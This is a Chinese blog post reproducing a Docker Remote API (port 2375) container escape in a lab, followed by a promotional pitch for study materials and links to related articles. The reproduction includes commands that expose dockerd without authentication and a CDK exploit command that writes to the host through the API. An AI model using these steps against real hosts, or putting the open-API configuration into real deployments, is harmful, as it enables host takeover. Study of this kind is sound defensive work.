Docker Remote API 逃逸攻击(2375端口)_2375 发送docker命令(1)

最新推荐文章于 2024-08-04 19:39:57 发布
最新推荐文章于 2024-08-04 19:39:57 发布
阅读量1.1k 收藏 29
点赞数 11
分类专栏: 2024年程序员学习 文章标签: docker 容器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60667406/article/details/137391538
版权

Docker Remote API 逃逸攻击(2375端口)

一、漏洞简介

Docker 2375端口上的 Remote API 存在未授权访问漏洞,攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸。

二、前置知识

Docker 远程管理端口

为了实现集群管理,Docker提供了远程管理接口。Docker Daemon作为守护进程,运行在后台,可以执行发送到管理接口上的Docker命令。正是因为错误地使用了Docker远端接口,引起了安全漏洞,因此在启动Docker Daemon时,加入-H 0.0.0.0:2375,Docker Daemon就可以接收远端的Docker Client发送的指令。Docker是把2375端口作为非加密端口暴露出来,一般是用在测试环境中。此时,没有任何加密和认证过程,只要知道Docker主机的IP,任何人都可以管理这台主机上的容器和镜像。

三、漏洞利用路径

  1. 检查2375端口:向宿主机2375端口发送HTTP GET请求/info
  2. 准备恶意容器镜像:向宿主机2375端口发送HTTP POST请求/images/create
  3. 实施攻击:向宿主机2375端口发送HTTP POST请求,分别用/containers/create和/containers//start创建并启动恶意活动容器,其中容器配置通过JSON在create构造

四、漏洞复现

环境搭建
  • ubuntu 20.04
  • docker 23.0.2

打开docker远程访问API:

  1. 打开/usr/lib/systemd/system/docker.service文件,在[service]ExeStart=...后面追加:

-H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

即:ExecStart=/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

  1. 重启生效

systemctl daemon-reload # 重新加载配置文件
systemctl restart docker

运行攻击容器:

docker run --rm -it --name=docker-api-pwn -v /root/cdk:/cdk ubuntu:20.04 bash

利用:

in container

./cdk run docker-api-pwn http://127.0.0.1:2375 “touch /host/tmp/docker-api-pwn” #ip地址改为宿主机地址或在创建容器时使用host网络
ls /tmp/docker-api-pwn

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

thon爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**

阿里Java技术
关注
  • 11
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker暴露2375端口,引起安全漏洞
02-26
DockerDaemon作为守护进程,运行在后台,可以执行发送到管理接口上的Docker命令。正是因为错误的使用了Docker远端接口,引起安全漏洞。国内牛人开发了一套牛逼的搜索引擎-钟馗之眼,可以扫描出主机上的暴露的端口。...
docker-compose-linux-x86_64
09-21
Docker-Compose项目是Docker官方的开源项目,负责实现对Docker容器集群的快速编排。 Docker-Compose将所管理的容器分为三层,分别是工程(project),服务(service)以及容器(container)。Docker-Compose运行...
docker未授权访问漏洞总结
qq_45746681的博客
10-05 1391
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、docker未授权访问漏洞是什么?二、复现1.环境搭建2 漏洞利用 前言 记录并复现常见的未授权访问漏洞 一、docker未授权访问漏洞是什么? Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。常见端口2375 二、复现 1.环境搭建 如果访问如下页面,返回一个json格式的值{“message”:“page not found”}即存在漏洞也可以访问ip
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令
2401_84544854的博客
05-16 361
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Docker未授权访问漏洞详解
m0_64481831的博客
06-11 1245
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器
Docker Remote API 逃逸攻击2375端口
weixin_31610083的博客
01-19 760
本文分析了如何通过 Docker 2375远程管理API来完成逃逸,但该漏洞需要管理员主动配置,没有广泛存在,但利用难度很低。
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令(2)
2401_84544780的博客
05-16 343
Docker 2375端口上的 Remote API 存在未授权访问漏洞攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令(4)
2401_84544780的博客
05-16 229
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Docker Remote API 逃逸攻击2375端口)_2375 发送docker命令(3)
2401_84544780的博客
05-16 377
Docker 2375端口上的 Remote API 存在未授权访问漏洞攻击者可以借此控制宿主机dockerd创建特权容器完成逃逸
Docker未授权API逃逸
qq_69775412的博客
04-19 2230
一、Docker未授权介绍: dockerswarm: docker swarm是一个将docker集群变成单一虚拟的dockerhost工具,使用标准的DockerAPI,能够方便docker集群的管理和扩展,由docker官方提供,具体的大家可以看官网介绍:https://docs.docker.com/engine/swarm/ 漏洞起因: 在使用dockerswarm的时候,发现管理的docker节点上会开放一个tcp端口2375,并且绑定在0.0.0.0上,http访问会返回404p...
Docker Remote API未授权访问漏洞以及安全防护
qq_46487664的博客
07-26 555
设备IP地址操作类型docker版本镜像训练机centos718.03.1-ce靶机Ubuntu24.0.4至少一个容器镜像。
Docker远程接口未授权访问漏洞解决方案之 Docker Remote API TLS 认证_docker远程接口未授权访问漏洞怎么解决
2401_84968016的博客
05-12 632
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Docker暴露2375端口导致服务器被攻击问题及解决方法
01-20
相信了解过docker remote API的同学对2375端口都不陌生了,2375docker远程操控的默认端口,通过这个端口可以直接对远程的docker daemon进行操作。 当$HOST主机以docker daemon -H=0.0.0.0:2375方式启动daemon时,...
docker基础命令
m0_69852463的博客
08-04 288
docker-ce的配置文件是/etc/docker/daemon.json,此文件默认不存在,需要我们手动创建并进行配置,而docker的加速就是通过配置此文件来实现的。#这种方式运行的容器不能关闭必须保存在前台工作,只能另开终端。使用docker attach命令进入容器不能使用终端。-i :即使没有附加也保持STDIN 打开。标记本地镜像,将其归入某一仓库。-d :分离模式: 在后台运行。创建一个可以在外面访问的容器。查看drocker的版本号。-t :分配一个伪终端。查看容器是否使用成功。
【Python】 如何用 Docker 打包一个 Python 脚本
最新发布
2333333
08-04 642
通过以上步骤,我们演示了如何使用 Docker 将一个简单的 Python 脚本打包成一个可移植的容器镜像。Docker 不仅可以简化开发和部署流程,还能确保在不同环境中的一致性,使得应用程序更加稳定和可靠。
利用Dockerfile文件执行docker build自动构建镜像
2301_78327423的博客
08-04 603
每个指令的执行会生成一个新的镜像层,为了减少dockerfile都按顺序执行,从头开始,已经执行过的指令已经缓存了,不需要再执行,如果后续有一行新的指令没执行过,其往后的指令将会重新执行,所以加速镜像制作,将最常变化的内容放在dockerfile的文件的后面。如果docker run后面没有额外参数,但是dockerfile中的CMD里有(即上面CMD的第三种用法),即Dockerfile中既有CMD也有ENTRYPOINT,那么CMD的全部内容会作为ENTRYPOINT的参数。两个RUN是独立的。
Docker Image 详细讲解
hai40587的博客
08-02 715
Docker Image 是一个轻量级、可执行的独立软件包,包含了运行某个软件所需要的所有内容,包括代码、运行时、库、环境变量、配置文件等。Docker 利用这些镜像来创建容器,每个容器都可以从镜像中运行实例,并且这些容器之间互相隔离,互不干扰。Docker Image 的设计目标是实现“一次构建,到处运行”(Build once, run anywhere),这意味着开发者可以在任何地方使用相同的镜像来运行他们的应用,无需担心环境差异。
ConfigMap-secrets-静态pod
weixin_46466657的博客
07-14 5287
ConfigMap资源,简称CM资源,它生成的键值对数据,存储在ETCD数据库中应用场景:主要是对应用程序的配置pod通过env变量引入ConfigMap,或者通过数据卷挂载volume的方式引入ConfigMap资源官方解释:configMap 卷提供了向 Pod 注入配置数据的方法。ConfigMap 对象中存储的数据可以被 configMap 类型的卷引用,然后被 Pod 中运行的容器化应用使用。引用 configMap 对象时,你可以在卷中通过它的名称来引用。
anything-llm/docker/HOW_TO_USE_DOCKER.md
06-15
2. 命令行工具介绍:解释docker run、docker build、docker-compose等基本命令及其用途。 3. 镜像管理:如何创建、下载、拉取和删除Docker镜像。 4. 运行容器:如何启动一个新容器,设置网络和端口映射,以及共享...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值